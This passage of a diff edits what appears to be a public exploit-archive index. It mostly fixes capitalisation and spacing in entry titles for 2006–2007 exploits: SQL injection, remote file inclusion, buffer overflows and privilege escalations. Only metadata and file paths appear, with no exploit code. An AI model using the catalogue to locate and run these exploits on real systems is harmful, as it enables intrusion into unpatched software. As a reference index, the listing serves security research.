Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 -2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - (LIBC TZ enviroment variable) Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 +2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7 / 4.7.2 - (FTP) Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0 @@ -2533,7 +2534,7 @@ id,file,description,date,author,platform,type,port 2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - (admin/edit.asp) SQL Injection",2006-11-26,bolivar,asp,webapps,0 2854,platforms/windows/dos/2854.py,"AT-TFTP 1.9 - (Long Filename) Remote Buffer Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 2855,platforms/windows/dos/2855.py,"3Com TFTP Service 2.0.1 - (Long Transporting Mode) Overflow (PoC)",2006-11-27,"Liu Qixu",windows,dos,0 -2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 +2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - htmlentities() Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0 2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0 2859,platforms/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0 @@ -2602,7 +2603,7 @@ id,file,description,date,author,platform,type,port 2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0 2927,platforms/php/webapps/2927.txt,"PHPMyCMS 0.3 - (basic.inc.php) Remote File Inclusion",2006-12-13,v1per-haCker,php,webapps,0 -2928,platforms/linux/dos/2928.py,"ProFTPD 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 +2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0 2930,platforms/php/webapps/2930.pl,"yaplap 0.6.1b - (ldap.php) Remote File Inclusion Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0 2931,platforms/php/webapps/2931.txt,"AR Memberscript - 'usercp_menu.php' Remote File Inclusion",2006-12-14,ex0,php,webapps,0 @@ -2694,11 +2695,11 @@ id,file,description,date,author,platform,type,port 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - (admin/uploads.php) Remote Code Execution Exploit",2006-12-26,undefined1_,php,webapps,0 -3021,platforms/linux/remote/3021.txt,"ProFTPD 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 +3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445 3023,platforms/linux/dos/3023.c,"KsIRC 1.3.12 - (PRIVMSG) Remote Buffer Overflow (PoC)",2006-12-26,"Federico L. Bossi Bonin",linux,dos,0 3024,platforms/windows/local/3024.c,"Microsoft Windows - NtRaiseHardError Csrss.exe Memory Disclosure Exploit",2006-12-27,"Ruben Santamarta ",windows,local,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path variable) Remote File Inclusion Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path Variable) Remote File Inclusion Exploit",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - (bu/process.php) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 @@ -2733,12 +2734,12 @@ id,file,description,date,author,platform,type,port 3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - (admin.mdb) Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 -3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp id variable'SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 +3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 3062,platforms/asp/webapps/3062.txt,"autoDealer 2.0 - (detail.asp iPro) SQL Injection",2007-01-01,ajann,asp,webapps,0 3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Transversal",2007-01-01,Bl0od3r,windows,remote,0 3064,platforms/multiple/remote/3064.rb,"Apple Quicktime - (rtsp URL Handler) Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0 3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - (passwd.txt) Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 -3066,platforms/asp/webapps/3066.txt,"newsCMSlite - 'newsCMS.mdb'Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 +3066,platforms/asp/webapps/3066.txt,"newsCMSlite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (Perl) (2)",2007-01-01,"Jacopo Cervini",windows,remote,25 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3069,platforms/osx/dos/3069.pl,"VLC Media Player 0.8.6 (PPC) - (udp://) Format String (PoC)",2007-01-02,MoAB,osx,dos,0 @@ -2754,7 +2755,7 @@ id,file,description,date,author,platform,type,port 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3080,platforms/osx/dos/3080.rb,"iLife iPhoto Photocast - (XML title) Remote Format String (PoC)",2007-01-04,MoAB,osx,dos,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 -3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id variable) SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 +3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id Variable) SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - (Code Execution / SQL Injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 @@ -2778,7 +2779,7 @@ id,file,description,date,author,platform,type,port 3103,platforms/php/webapps/3103.php,"@lex GuestBook 4.0.2 - Remote Command Execution Exploit",2007-01-08,DarkFig,php,webapps,0 3104,platforms/php/webapps/3104.txt,"PPC Search Engine 1.61 - (INC) Multiple Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 3105,platforms/asp/webapps/3105.txt,"MOTIONBORG Web Real Estate 2.1 - SQL Injection",2007-01-09,ajann,asp,webapps,0 -3106,platforms/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx'SQL Injection",2007-01-09,ajann,php,webapps,0 +3106,platforms/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,php,webapps,0 3107,platforms/windows/remote/3107.pm,"FileCOPA FTP Server 1.01 - (LIST) Remote Buffer Overflow Exploit (Metasploit)",2007-01-09,"Jacopo Cervini",windows,remote,21 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion Exploit",2007-01-09,DeltahackingTEAM,php,webapps,0 3109,platforms/php/webapps/3109.php,"Wordpress 2.0.6 - wp-trackback.php SQL Injection",2007-01-10,rgod,php,webapps,0 @@ -2811,7 +2812,7 @@ id,file,description,date,author,platform,type,port 3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 - (GET) Remote Denial of Service",2003-07-07,anonymous,windows,dos,0 3139,platforms/osx/dos/3139.rb,"Colloquy 2.1.3545 - (INVITE) Format String Denial of Service",2007-01-17,MoAB,osx,dos,0 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21 -3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id variable) SQL Injection",2007-01-17,SlimTim10,php,webapps,0 +3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id Variable) SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3142,platforms/windows/dos/3142.html,"CCRP Folder Treeview Control (ccrpftv6.ocx) - IE Denial of Service",2007-01-17,shinnai,windows,dos,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2)",2007-01-17,trew,php,webapps,0 @@ -2819,7 +2820,7 @@ id,file,description,date,author,platform,type,port 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3)",2007-01-17,666,php,webapps,0 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (frontpage.php) Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0 3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 -3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.CNT'Buffer Overflow",2007-01-17,porkythepig,windows,local,0 +3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.cnt' Buffer Overflow",2007-01-17,porkythepig,windows,local,0 3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 3151,platforms/osx/dos/3151.rb,"Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)",2007-01-18,MoAB,osx,dos,0 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 @@ -2829,7 +2830,7 @@ id,file,description,date,author,platform,type,port 3156,platforms/osx/local/3156.rb,"Rumpus 5.1 - Privilege Escalation / Remote FTP LIST (PoC)",2007-01-19,MoAB,osx,local,0 3157,platforms/windows/dos/3157.html,"DivX Player 6.4.1 - (DivXBrowserPlugin npdivx32.dll) IE Denial of Service",2007-01-19,shinnai,windows,dos,0 3158,platforms/windows/remote/3158.c,"Intel Centrino ipw2200BG - Wireless Driver Remote Overflow (PoC)",2007-01-19,oveRet,windows,remote,0 -3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - '.HPJ'Buffer Overflow",2007-01-19,porkythepig,windows,local,0 +3159,platforms/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - '.HPJ' Buffer Overflow",2007-01-19,porkythepig,windows,local,0 3160,platforms/osx/dos/3160.html,"Transmit.app 3.5.5 - ftps:// URL Handler Heap Buffer Overflow (PoC)",2007-01-20,MoAB,osx,dos,0 3161,platforms/php/webapps/3161.txt,"PHPSherpa - (include/config.inc.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - (include/includes.php) Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 @@ -2846,7 +2847,7 @@ id,file,description,date,author,platform,type,port 3173,platforms/osx/local/3173.rb,"Mac OSX 10.4.8 - System Preferences Privilege Escalation",2007-01-21,MoAB,osx,local,0 3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion Exploit",2007-01-22,bd0rk,php,webapps,0 -3176,platforms/windows/local/3176.cpp,"Microsoft Visual C++ - '.RC Resource Files'Local Buffer Overflow",2007-01-22,porkythepig,windows,local,0 +3176,platforms/windows/local/3176.cpp,"Microsoft Visual C++ - '.RC Resource Files' Local Buffer Overflow",2007-01-22,porkythepig,windows,local,0 3177,platforms/multiple/local/3177.txt,"Oracle 10g - SYS.DBMS_CDC_IMPDP.BUMP_SEQUENCE PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3178,platforms/multiple/local/3178.txt,"Oracle 10g - SYS.KUPW$WORKER.MAIN PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 3179,platforms/multiple/local/3179.txt,"Oracle 10g - SYS.KUPV$FT.ATTACH_JOB PL / SQL Injection",2007-01-23,"Joxean Koret",multiple,local,0 @@ -2903,7 +2904,7 @@ id,file,description,date,author,platform,type,port 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps,0 3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - (faq.php) SQL Injection",2007-01-31,ajann,php,webapps,0 -3235,platforms/php/webapps/3235.txt,"Phpbb Tweaked 3 - (phpbb_root_path) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 +3235,platforms/php/webapps/3235.txt,"phpBB Tweaked 3 - (phpBB_root_path) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - (phpbb_root_path) Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,php,webapps,0 3238,platforms/php/webapps/3238.txt,"PHPMyRing 4.1.3b - (fichier) Remote File Inclusion",2007-01-31,ajann,php,webapps,0 @@ -2927,7 +2928,7 @@ id,file,description,date,author,platform,type,port 3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0 3257,platforms/osx/dos/3257.php,"Chicken of the VNC 2.0 - (NULL-pointer) Remote Denial of Service",2007-02-02,poplix,osx,dos,0 3258,platforms/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - (ezconvert_dir) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 -3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - (phpbb_root_path) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 +3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - (phpBB_root_path) Remote File Inclusion Exploit",2007-02-02,"Mehmet Ince",php,webapps,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution Exploit",2007-02-03,xCuter,windows,local,0 3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - (view.php) SQL Injection",2007-02-03,ajann,php,webapps,0 3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - (pms.php) SQL Injection",2007-02-03,rgod,php,webapps,0 @@ -2938,7 +2939,7 @@ id,file,description,date,author,platform,type,port 3267,platforms/php/webapps/3267.txt,"Geeklog 2 - 'BaseView.php' Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 3268,platforms/php/webapps/3268.txt,"SMA-DB 0.3.9 - (settings.php) Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 3269,platforms/multiple/remote/3269.pl,"Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection",2007-02-05,bunker,multiple,remote,0 -3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - (phpbb_root_path) Remote File Inclusion Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 +3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - (phpBB_root_path) Remote File Inclusion Exploit",2007-02-05,"Mehmet Ince",php,webapps,0 3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution Exploit",2007-02-05,Kacper,php,webapps,0 3272,platforms/windows/dos/3272.html,"Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference Exploit",2007-02-05,AmesianX,windows,dos,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 @@ -2997,10 +2998,10 @@ id,file,description,date,author,platform,type,port 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - (album) SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion Exploit",2007-02-18,ajann,php,webapps,0 3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 - (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110 -3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 +3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0 -3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 +3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps,0 3335,platforms/windows/remote/3335.pm,"IPSwitch WS-FTP 5.05 - (XMD5) Remote Buffer Overflow (Metasploit)",2007-02-19,"Jacopo Cervini",windows,remote,21 3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - (function.php) Remote File Inclusion",2007-02-20,kezzap66345,php,webapps,0 @@ -3016,7 +3017,7 @@ id,file,description,date,author,platform,type,port 3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection",2007-02-20,krasza,php,webapps,0 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 -3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.NBI'Local Buffer Overflow",2007-02-21,Marsu,windows,local,0 +3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0 3350,platforms/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Methods Denial of Service",2007-02-21,shinnai,windows,dos,0 3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - (topic) SQL Injection",2007-02-21,DNX,php,webapps,0 3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 @@ -3036,7 +3037,7 @@ id,file,description,date,author,platform,type,port 3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - (sinagb.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0 3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (Perl) (2)",2007-02-24,"Umesh Wanve",windows,local,0 -3370,platforms/php/webapps/3370.pl,"Extreme PHPBB 3.0.1 - (functions.php) Remote File Inclusion Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 +3370,platforms/php/webapps/3370.pl,"Extreme phpBB 3.0.1 - (functions.php) Remote File Inclusion Exploit",2007-02-24,"Mehmet Ince",php,webapps,0 3371,platforms/php/webapps/3371.php,"Coppermine Photo Gallery 1.3.x - Blind SQL Injection",2007-02-24,s0cratex,php,webapps,0 3372,platforms/php/webapps/3372.php,"CS-Gallery 2.0 - (index.php album) Remote File Inclusion Exploit",2007-02-24,burncycle,php,webapps,0 3373,platforms/php/webapps/3373.pl,"phpBB Module NoMoKeTos Rules 0.0.1 - Remote File Inclusion Exploit",2007-02-24,bd0rk,php,webapps,0 @@ -3049,7 +3050,7 @@ id,file,description,date,author,platform,type,port 3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Remote Path Traversal",2007-02-27,"Sergey Gordeychik",windows,remote,0 3381,platforms/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging Exploit",2007-02-27,"Craig Heffner",windows,remote,0 3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a - (del.php include_path) Remote File Inclusion",2007-02-27,GoLd_M,php,webapps,0 -3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite'Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 +3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - (CGI TTY) Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - (ABOR) Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local,0 @@ -3085,7 +3086,7 @@ id,file,description,date,author,platform,type,port 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection",2007-03-05,ajann,php,webapps,0 3417,platforms/windows/local/3417.php,"PHP 4.4.6 - mssql_[p]connect() Local Buffer Overflow",2007-03-05,rgod,windows,local,0 3418,platforms/windows/dos/3418.pl,"Mercury/32 Mail Server 4.01b - (check) Buffer Overflow (PoC)",2007-03-06,mu-b,windows,dos,0 -3419,platforms/windows/dos/3419.txt,"Microsoft Windows - '.doc'Malformed Pointers Denial of Service",2007-03-06,Marsu,windows,dos,0 +3419,platforms/windows/dos/3419.txt,"Microsoft Windows - '.doc' Malformed Pointers Denial of Service",2007-03-06,Marsu,windows,dos,0 3420,platforms/windows/remote/3420.html,"WinZip 10.0.7245 - FileView ActiveX Buffer Overflow (2)",2007-03-06,prdelka,windows,remote,0 3421,platforms/windows/dos/3421.html,"Macromedia 10.1.4.20 - SwDir.dll Internet Explorer Stack Overflow Denial of Service",2007-03-07,shinnai,windows,dos,0 3422,platforms/windows/remote/3422.pl,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)",2007-03-07,"Umesh Wanve",windows,remote,0 @@ -3131,7 +3132,7 @@ id,file,description,date,author,platform,type,port 3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow Exploit",2007-03-12,Marsu,windows,dos,0 3465,platforms/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",2007-03-12,K-159,php,webapps,0 3466,platforms/asp/webapps/3466.txt,"BP Blog 7.0 - (default.asp layout) SQL Injection",2007-03-12,BeyazKurt,asp,webapps,0 -3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide'Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 +3467,platforms/php/webapps/3467.txt,"GestArt Beta 1 - 'aide.php aide' Remote File Inclusion",2007-03-13,Dj7xpl,php,webapps,0 3468,platforms/php/webapps/3468.txt,"MySQL Commander 2.7 - (home) Remote File Inclusion",2007-03-13,K-159,php,webapps,0 3469,platforms/asp/webapps/3469.txt,"X-ice News System 1.0 - (devami.asp id) SQL Injection",2007-03-13,CyberGhost,asp,webapps,0 3470,platforms/asp/webapps/3470.htm,"JGBBS 3.0beta1 - (search.asp author) SQL Injection",2007-03-13,WiLdBoY,asp,webapps,0 @@ -3224,7 +3225,7 @@ id,file,description,date,author,platform,type,port 3560,platforms/php/webapps/3560.txt,"Joomla Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 - (LOGIN) Remote IMAP Stack Buffer Overflow",2007-03-24,"Jacopo Cervini",windows,remote,143 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 -3563,platforms/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php lib_path'Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 +3563,platforms/php/webapps/3563.txt,"ttCMS 4 - 'ez_sql.php lib_path' Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager 1.1 - SQL Injection",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards 2.4.3 - SQL Injection",2007-03-24,ajann,php,webapps,0 3566,platforms/multiple/dos/3566.pl,"Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service",2007-03-25,MADYNES,multiple,dos,0 @@ -3253,7 +3254,7 @@ id,file,description,date,author,platform,type,port 3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps,0 3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0 -3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - '.PRS'Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0 +3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - (index.php cat_id) SQL Injection",2007-03-28,ajann,php,webapps,0 3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - (header.php) Remote File 